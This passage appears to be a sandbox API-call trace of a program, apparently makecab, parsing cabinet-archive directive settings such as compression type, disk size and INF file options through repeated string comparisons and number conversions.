[0254.388] _strcmpi (_Str1="Compress", _Str2="InfFileLineFormat") returned -6 [0254.388] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFileLineFormat") returned 3 [0254.388] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFileLineFormat") returned -6 [0254.388] _strcmpi (_Str1="CompressionType", _Str2="InfFileLineFormat") returned -6 [0254.388] _strcmpi (_Str1="CompressionLevel", _Str2="InfFileLineFormat") returned -6 [0254.388] _strcmpi (_Str1="CompressionMemory", _Str2="InfFileLineFormat") returned -6 [0254.388] _strcmpi (_Str1="DestinationDir", _Str2="InfFileLineFormat") returned -5 [0254.388] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFileLineFormat") returned -5 [0254.388] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFileLineFormat") returned -5 [0254.388] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFileLineFormat") returned -5 [0254.388] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFileLineFormat") returned -3 [0254.388] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFileLineFormat") returned -3 [0254.388] _strcmpi (_Str1="GenerateInf", _Str2="InfFileLineFormat") returned -2 [0254.388] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFileLineFormat") returned -3 [0254.388] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFileLineFormat") returned -3 [0254.388] _strcmpi (_Str1="InfCommentString", _Str2="InfFileLineFormat") returned -3 [0254.388] _strcmpi (_Str1="InfDateFormat", _Str2="InfFileLineFormat") returned -2 [0254.388] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFileLineFormat") returned -2 [0254.388] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFileLineFormat") returned -2 [0254.388] _strcmpi (_Str1="InfFileHeader", _Str2="InfFileLineFormat") returned -4 [0254.389] atoi (_Str="1") returned 1 [0254.389] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfFileLineFormat") returned 17 [0254.389] atoi (_Str="1") returned 1 [0254.389] _strcmpi (_Str1="Cabinet", _Str2="InfFileName") returned -6 [0254.389] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFileName") returned -6 [0254.389] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFileName") returned -6 [0254.389] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFileName") returned -6 [0254.389] _strcmpi (_Str1="ClusterSize", _Str2="InfFileName") returned -6 [0254.389] _strcmpi (_Str1="Compress", _Str2="InfFileName") returned -6 [0254.389] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFileName") returned 3 [0254.389] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFileName") returned -6 [0254.389] _strcmpi (_Str1="CompressionType", _Str2="InfFileName") returned -6 [0254.389] _strcmpi (_Str1="CompressionLevel", _Str2="InfFileName") returned -6 [0254.389] _strcmpi (_Str1="CompressionMemory", _Str2="InfFileName") returned -6 [0254.389] _strcmpi (_Str1="DestinationDir", _Str2="InfFileName") returned -5 [0254.389] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFileName") returned -5 [0254.389] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFileName") returned -5 [0254.389] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFileName") returned -5 [0254.389] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFileName") returned -3 [0254.389] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFileName") returned -3 [0254.389] _strcmpi (_Str1="GenerateInf", _Str2="InfFileName") returned -2 [0254.389] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFileName") returned -3 [0254.389] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFileName") returned -3 [0254.389] _strcmpi (_Str1="InfCommentString", _Str2="InfFileName") returned -3 [0254.389] _strcmpi (_Str1="InfDateFormat", _Str2="InfFileName") returned -2 [0254.389] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFileName") returned -2 [0254.389] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFileName") returned -2 [0254.389] _strcmpi (_Str1="InfFileHeader", _Str2="InfFileName") returned -6 [0254.389] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfFileName") returned -2 [0254.389] atoi (_Str="1") returned 1 [0254.389] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfFileName") returned 11 [0254.389] atoi (_Str="1") returned 1 [0254.390] _strcmpi (_Str1="Cabinet", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="ClusterSize", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="Compress", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFooter") returned 3 [0254.390] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="CompressionType", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="CompressionLevel", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="CompressionMemory", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="DestinationDir", _Str2="InfFooter") returned -5 [0254.390] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFooter") returned -5 [0254.390] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFooter") returned -5 [0254.390] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFooter") returned -5 [0254.390] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFooter") returned -3 [0254.390] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFooter") returned -3 [0254.390] _strcmpi (_Str1="GenerateInf", _Str2="InfFooter") returned -2 [0254.390] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFooter") returned -3 [0254.390] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFooter") returned -3 [0254.390] _strcmpi (_Str1="InfCommentString", _Str2="InfFooter") returned -3 [0254.390] _strcmpi (_Str1="InfDateFormat", _Str2="InfFooter") returned -2 [0254.390] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFooter") returned -2 [0254.390] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFooter") returned -2 [0254.390] _strcmpi (_Str1="InfFileHeader", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfFooter") returned -6 [0254.390] _strcmpi (_Str1="InfFileName", _Str2="InfFooter") returned -6 [0254.390] atoi (_Str="1") returned 1 [0254.390] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfFooter") returned 9 [0254.390] atoi (_Str="1") returned 1 [0254.390] _strcmpi (_Str1="Cabinet", _Str2="InfFooter1") returned -6 [0254.390] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFooter1") returned -6 [0254.390] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFooter1") returned -6 [0254.391] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFooter1") returned -6 [0254.391] _strcmpi (_Str1="ClusterSize", _Str2="InfFooter1") returned -6 [0254.391] _strcmpi (_Str1="Compress", _Str2="InfFooter1") returned -6 [0254.391] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFooter1") returned 3 [0254.391] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFooter1") returned -6 [0254.391] _strcmpi (_Str1="CompressionType", _Str2="InfFooter1") returned -6 [0254.391] _strcmpi (_Str1="CompressionLevel", _Str2="InfFooter1") returned -6 [0254.391] _strcmpi (_Str1="CompressionMemory", _Str2="InfFooter1") returned -6 [0254.391] _strcmpi (_Str1="DestinationDir", _Str2="InfFooter1") returned -5 [0254.391] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFooter1") returned -5 [0254.391] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFooter1") returned -5 [0254.391] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFooter1") returned -5 [0254.391] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFooter1") returned -3 [0254.391] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFooter1") returned -3 [0254.391] _strcmpi (_Str1="GenerateInf", _Str2="InfFooter1") returned -2 [0254.391] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFooter1") returned -3 [0254.391] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFooter1") returned -3 [0254.391] _strcmpi (_Str1="InfCommentString", _Str2="InfFooter1") returned -3 [0254.391] _strcmpi (_Str1="InfDateFormat", _Str2="InfFooter1") returned -2 [0254.391] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFooter1") returned -2 [0254.391] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFooter1") returned -2 [0254.391] atoi (_Str="1") returned 1 [0254.391] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfFooter1") returned 10 [0254.391] atoi (_Str="1") returned 1 [0254.391] atoi (_Str="1") returned 1 [0254.391] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfFooter2") returned 10 [0254.391] atoi (_Str="1") returned 1 [0254.392] atoi (_Str="1") returned 1 [0254.392] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfFooter3") returned 10 [0254.392] atoi (_Str="1") returned 1 [0254.392] atoi (_Str="1") returned 1 [0254.392] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfFooter4") returned 10 [0254.392] atoi (_Str="1") returned 1 [0254.392] atoi (_Str="1") returned 1 [0254.392] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfHeader") returned 9 [0254.392] atoi (_Str="1") returned 1 [0254.392] atoi (_Str="1") returned 1 [0254.392] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfHeader1") returned 10 [0254.392] atoi (_Str="1") returned 1 [0254.393] atoi (_Str="1") returned 1 [0254.393] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfHeader2") returned 10 [0254.393] atoi (_Str="1") returned 1 [0254.393] atoi (_Str="1") returned 1 [0254.393] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfHeader3") returned 10 [0254.393] atoi (_Str="1") returned 1 [0254.393] atoi (_Str="1") returned 1 [0254.393] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfHeader4") returned 10 [0254.393] atoi (_Str="1") returned 1 [0254.393] atoi (_Str="1") returned 1 [0254.393] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfHeader5") returned 10 [0254.393] atoi (_Str="1") returned 1 [0254.394] atoi (_Str="1") returned 1 [0254.394] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfHeader6") returned 10 [0254.394] atoi (_Str="1") returned 1 [0254.394] atoi (_Str="1") returned 1 [0254.394] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="InfSectionOrder") returned 15 [0254.394] atoi (_Str="1") returned 1 [0254.394] atoi (_Str="1") returned 1 [0254.394] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="MaxCabinetSize") returned 14 [0254.394] atoi (_Str="1") returned 1 [0254.394] atoi (_Str="1") returned 1 [0254.394] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="MaxDiskFileCount") returned 16 [0254.394] atoi (_Str="1") returned 1 [0254.395] _strcmpi (_Str1="1.44M", _Str2="360K") returned -2 [0254.395] atol (_Str="362496") returned 362496 [0254.395] atol (_Str="1.44M") returned 1 [0254.395] _strcmpi (_Str1="1.44M", _Str2="720K") returned -6 [0254.395] atol (_Str="730112") returned 730112 [0254.395] atol (_Str="1.44M") returned 1 [0254.395] _strcmpi (_Str1="1.44M", _Str2="1.2M") returned 2 [0254.395] atol (_Str="1213952") returned 1213952 [0254.395] atol (_Str="1.44M") returned 1 [0254.395] _strcmpi (_Str1="1.44M", _Str2="1.25M") returned 2 [0254.395] atol (_Str="1250304") returned 1250304 [0254.395] atol (_Str="1.44M") returned 1 [0254.395] _strcmpi (_Str1="1.44M", _Str2="1.44M") returned 0 [0254.395] atoi (_Str="1") returned 1 [0254.395] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="MaxDiskSize") returned 11 [0254.395] atoi (_Str="1") returned 1 [0254.395] _strcmpi (_Str1="1.44M", _Str2="360K") returned -2 [0254.395] atol (_Str="362496") returned 362496 [0254.395] atol (_Str="1.44M") returned 1 [0254.395] _strcmpi (_Str1="1.44M", _Str2="720K") returned -6 [0254.395] atol (_Str="730112") returned 730112 [0254.395] atol (_Str="1.44M") returned 1 [0254.395] _strcmpi (_Str1="1.44M", _Str2="1.2M") returned 2 [0254.395] atol (_Str="1213952") returned 1213952 [0254.395] atol (_Str="1.44M") returned 1 [0254.395] _strcmpi (_Str1="1.44M", _Str2="1.25M") returned 2 [0254.395] atol (_Str="1250304") returned 1250304 [0254.395] atol (_Str="1.44M") returned 1 [0254.396] _strcmpi (_Str1="1.44M", _Str2="1.44M") returned 0 [0254.396] atoi (_Str="1") returned 1 [0254.396] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="MaxErrors") returned 9 [0254.396] atoi (_Str="1") returned 1 [0254.396] atoi (_Str="1") returned 1 [0254.396] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="ReservePerCabinetSize") returned 21 [0254.396] atoi (_Str="1") returned 1 [0254.396] atoi (_Str="1") returned 1 [0254.396] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="ReservePerDataBlockSize") returned 23 [0254.396] atoi (_Str="1") returned 1 [0254.397] atoi (_Str="1") returned 1 [0254.397] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="ReservePerFolderSize") returned 20 [0254.397] atoi (_Str="1") returned 1 [0254.397] atoi (_Str="1") returned 1 [0254.397] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="RptFileName") returned 11 [0254.397] atoi (_Str="1") returned 1 [0254.397] atoi (_Str="1") returned 1 [0254.397] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="SourceDir") returned 9 [0254.397] atoi (_Str="1") returned 1 [0254.398] atoi (_Str="1") returned 1 [0254.398] _vsnprintf (in: _DstBuf=0x27e87ff010, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fef78 | out: _DstBuf="UniqueFiles") returned 11 [0254.398] atoi (_Str="1") returned 1 [0254.398] _strcmpi (_Str1="On", _Str2="No") returned 1 [0254.398] _strcmpi (_Str1="On", _Str2="Off") returned 8 [0254.398] _strcmpi (_Str1="On", _Str2="False") returned 9 [0254.398] _strcmpi (_Str1="On", _Str2="Yes") returned -10 [0254.398] _strcmpi (_Str1="On", _Str2="On") returned 0 [0254.398] _stat (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin", _Stat=0x27e87fe380) returned 0 [0254.437] clock () returned 0x71 [0254.438] printf (_Format="%s%s\r") returned 19 [0254.490] atoi (_Str="1") returned 1 [0254.490] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="Cabinet") returned 7 [0254.490] atoi (_Str="1") returned 1 [0254.490] _strcmpi (_Str1="1", _Str2="No") returned -61 [0254.490] _strcmpi (_Str1="1", _Str2="Off") returned -62 [0254.490] _strcmpi (_Str1="1", _Str2="False") returned -53 [0254.490] _strcmpi (_Str1="Cabinet", _Str2="CabinetFileCountThreshold") returned -102 [0254.490] atoi (_Str="1") returned 1 [0254.490] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="CabinetFileCountThreshold") returned 25 [0254.490] atoi (_Str="1") returned 1 [0254.490] _strcmpi (_Str1="Cabinet", _Str2="CabinetNameTemplate") returned -110 [0254.491] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CabinetNameTemplate") returned -8 [0254.491] atoi (_Str="1") returned 1 [0254.491] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="CabinetNameTemplate") returned 19 [0254.491] atoi (_Str="1") returned 1 [0254.491] _strcmpi (_Str1="Cabinet", _Str2="ChecksumWidth") returned -7 [0254.491] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="ChecksumWidth") returned -7 [0254.491] _strcmpi (_Str1="CabinetNameTemplate", _Str2="ChecksumWidth") returned -7 [0254.491] atoi (_Str="1") returned 1 [0254.491] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="ChecksumWidth") returned 13 [0254.491] atoi (_Str="1") returned 1 [0254.491] atoi (_Str="8") returned 8 [0254.491] atoi (_Str="1") returned 1 [0254.491] atoi (_Str="8") returned 8 [0254.491] _strcmpi (_Str1="Cabinet", _Str2="ClusterSize") returned -11 [0254.491] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="ClusterSize") returned -11 [0254.491] _strcmpi (_Str1="CabinetNameTemplate", _Str2="ClusterSize") returned -11 [0254.491] _strcmpi (_Str1="ChecksumWidth", _Str2="ClusterSize") returned -4 [0254.491] atoi (_Str="1") returned 1 [0254.492] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="ClusterSize") returned 11 [0254.492] atoi (_Str="1") returned 1 [0254.492] _strcmpi (_Str1="512", _Str2="360K") returned 2 [0254.492] atol (_Str="362496") returned 362496 [0254.492] atol (_Str="512") returned 512 [0254.492] _strcmpi (_Str1="512", _Str2="720K") returned -2 [0254.492] atol (_Str="730112") returned 730112 [0254.492] atol (_Str="512") returned 512 [0254.492] _strcmpi (_Str1="512", _Str2="1.2M") returned 4 [0254.492] atol (_Str="1213952") returned 1213952 [0254.492] atol (_Str="512") returned 512 [0254.492] _strcmpi (_Str1="512", _Str2="1.25M") returned 4 [0254.492] atol (_Str="1250304") returned 1250304 [0254.492] atol (_Str="512") returned 512 [0254.492] _strcmpi (_Str1="512", _Str2="1.44M") returned 4 [0254.492] atol (_Str="1457664") returned 1457664 [0254.492] atol (_Str="512") returned 512 [0254.492] _strcmpi (_Str1="512", _Str2="1.68M") returned 4 [0254.492] atol (_Str="1716224") returned 1716224 [0254.492] atol (_Str="512") returned 512 [0254.492] _strcmpi (_Str1="512", _Str2="DMF168") returned -47 [0254.492] atol (_Str="1716224") returned 1716224 [0254.492] atol (_Str="512") returned 512 [0254.492] _strcmpi (_Str1="512", _Str2="CDROM") returned -46 [0254.492] atol (_Str="681984000") returned 681984000 [0254.492] atol (_Str="512") returned 512 [0254.493] _strcmpi (_Str1="Cabinet", _Str2="Compress") returned -14 [0254.493] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Compress") returned -14 [0254.493] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Compress") returned -14 [0254.493] _strcmpi (_Str1="ChecksumWidth", _Str2="Compress") returned -7 [0254.493] _strcmpi (_Str1="ClusterSize", _Str2="Compress") returned -3 [0254.493] atoi (_Str="1") returned 1 [0254.493] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="Compress") returned 8 [0254.493] atoi (_Str="1") returned 1 [0254.493] _strcmpi (_Str1="1", _Str2="No") returned -61 [0254.493] _strcmpi (_Str1="1", _Str2="Off") returned -62 [0254.493] _strcmpi (_Str1="1", _Str2="False") returned -53 [0254.493] _strcmpi (_Str1="Cabinet", _Str2="LongSourceFileNames") returned -9 [0254.493] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="LongSourceFileNames") returned -9 [0254.493] _strcmpi (_Str1="CabinetNameTemplate", _Str2="LongSourceFileNames") returned -9 [0254.493] _strcmpi (_Str1="ChecksumWidth", _Str2="LongSourceFileNames") returned -9 [0254.493] _strcmpi (_Str1="ClusterSize", _Str2="LongSourceFileNames") returned -9 [0254.493] _strcmpi (_Str1="Compress", _Str2="LongSourceFileNames") returned -9 [0254.493] atoi (_Str="1") returned 1 [0254.493] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="LongSourceFileNames") returned 19 [0254.493] atoi (_Str="1") returned 1 [0254.494] _strcmpi (_Str1="Cabinet", _Str2="CompressedFileExtensionChar") returned -14 [0254.494] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CompressedFileExtensionChar") returned -14 [0254.494] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CompressedFileExtensionChar") returned -14 [0254.494] _strcmpi (_Str1="ChecksumWidth", _Str2="CompressedFileExtensionChar") returned -7 [0254.494] _strcmpi (_Str1="ClusterSize", _Str2="CompressedFileExtensionChar") returned -3 [0254.494] _strcmpi (_Str1="Compress", _Str2="CompressedFileExtensionChar") returned -101 [0254.494] _strcmpi (_Str1="LongSourceFileNames", _Str2="CompressedFileExtensionChar") returned 9 [0254.494] atoi (_Str="1") returned 1 [0254.494] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="CompressedFileExtensionChar") returned 27 [0254.494] atoi (_Str="1") returned 1 [0254.494] _strcmpi (_Str1="Cabinet", _Str2="CompressionType") returned -14 [0254.494] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CompressionType") returned -14 [0254.494] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CompressionType") returned -14 [0254.494] _strcmpi (_Str1="ChecksumWidth", _Str2="CompressionType") returned -7 [0254.494] _strcmpi (_Str1="ClusterSize", _Str2="CompressionType") returned -3 [0254.494] _strcmpi (_Str1="Compress", _Str2="CompressionType") returned -105 [0254.494] _strcmpi (_Str1="LongSourceFileNames", _Str2="CompressionType") returned 9 [0254.494] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="CompressionType") returned -4 [0254.494] atoi (_Str="1") returned 1 [0254.494] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="CompressionType") returned 15 [0254.494] atoi (_Str="1") returned 1 [0254.495] _strcmpi (_Str1="MSZIP", _Str2="MSZIP") returned 0 [0254.495] _strcmpi (_Str1="Cabinet", _Str2="CompressionLevel") returned -14 [0254.495] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CompressionLevel") returned -14 [0254.495] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CompressionLevel") returned -14 [0254.495] _strcmpi (_Str1="ChecksumWidth", _Str2="CompressionLevel") returned -7 [0254.495] _strcmpi (_Str1="ClusterSize", _Str2="CompressionLevel") returned -3 [0254.495] _strcmpi (_Str1="Compress", _Str2="CompressionLevel") returned -105 [0254.495] _strcmpi (_Str1="LongSourceFileNames", _Str2="CompressionLevel") returned 9 [0254.495] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="CompressionLevel") returned -4 [0254.495] _strcmpi (_Str1="CompressionType", _Str2="CompressionLevel") returned 8 [0254.495] atoi (_Str="1") returned 1 [0254.495] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="CompressionLevel") returned 16 [0254.495] atoi (_Str="1") returned 1 [0254.495] atoi (_Str="2") returned 2 [0254.495] atoi (_Str="1") returned 1 [0254.495] atoi (_Str="7") returned 7 [0254.495] _strcmpi (_Str1="Cabinet", _Str2="CompressionMemory") returned -14 [0254.495] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CompressionMemory") returned -14 [0254.495] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CompressionMemory") returned -14 [0254.495] _strcmpi (_Str1="ChecksumWidth", _Str2="CompressionMemory") returned -7 [0254.495] _strcmpi (_Str1="ClusterSize", _Str2="CompressionMemory") returned -3 [0254.495] _strcmpi (_Str1="Compress", _Str2="CompressionMemory") returned -105 [0254.495] _strcmpi (_Str1="LongSourceFileNames", _Str2="CompressionMemory") returned 9 [0254.496] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="CompressionMemory") returned -4 [0254.496] _strcmpi (_Str1="CompressionType", _Str2="CompressionMemory") returned 7 [0254.496] _strcmpi (_Str1="CompressionLevel", _Str2="CompressionMemory") returned -1 [0254.496] atoi (_Str="1") returned 1 [0254.496] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="CompressionMemory") returned 17 [0254.496] atoi (_Str="1") returned 1 [0254.496] atoi (_Str="18") returned 18 [0254.496] atoi (_Str="10") returned 10 [0254.496] atoi (_Str="21") returned 21 [0254.496] _strcmpi (_Str1="Cabinet", _Str2="DestinationDir") returned -1 [0254.496] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DestinationDir") returned -1 [0254.496] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DestinationDir") returned -1 [0254.496] _strcmpi (_Str1="ChecksumWidth", _Str2="DestinationDir") returned -1 [0254.496] _strcmpi (_Str1="ClusterSize", _Str2="DestinationDir") returned -1 [0254.496] _strcmpi (_Str1="Compress", _Str2="DestinationDir") returned -1 [0254.496] _strcmpi (_Str1="LongSourceFileNames", _Str2="DestinationDir") returned 8 [0254.496] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DestinationDir") returned -1 [0254.496] _strcmpi (_Str1="CompressionType", _Str2="DestinationDir") returned -1 [0254.496] _strcmpi (_Str1="CompressionLevel", _Str2="DestinationDir") returned -1 [0254.496] _strcmpi (_Str1="CompressionMemory", _Str2="DestinationDir") returned -1 [0254.496] atoi (_Str="1") returned 1 [0254.496] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="DestinationDir") returned 14 [0254.496] atoi (_Str="1") returned 1 [0254.497] _strcmpi (_Str1="Cabinet", _Str2="DiskDirectoryTemplate") returned -1 [0254.497] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DiskDirectoryTemplate") returned -1 [0254.497] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DiskDirectoryTemplate") returned -1 [0254.497] _strcmpi (_Str1="ChecksumWidth", _Str2="DiskDirectoryTemplate") returned -1 [0254.497] _strcmpi (_Str1="ClusterSize", _Str2="DiskDirectoryTemplate") returned -1 [0254.497] _strcmpi (_Str1="Compress", _Str2="DiskDirectoryTemplate") returned -1 [0254.497] _strcmpi (_Str1="LongSourceFileNames", _Str2="DiskDirectoryTemplate") returned 8 [0254.497] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DiskDirectoryTemplate") returned -1 [0254.497] _strcmpi (_Str1="CompressionType", _Str2="DiskDirectoryTemplate") returned -1 [0254.497] _strcmpi (_Str1="CompressionLevel", _Str2="DiskDirectoryTemplate") returned -1 [0254.497] _strcmpi (_Str1="CompressionMemory", _Str2="DiskDirectoryTemplate") returned -1 [0254.497] _strcmpi (_Str1="DestinationDir", _Str2="DiskDirectoryTemplate") returned -4 [0254.497] atoi (_Str="1") returned 1 [0254.497] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="DiskDirectoryTemplate") returned 21 [0254.497] atoi (_Str="1") returned 1 [0254.497] _strcmpi (_Str1="Cabinet", _Str2="DiskLabelTemplate") returned 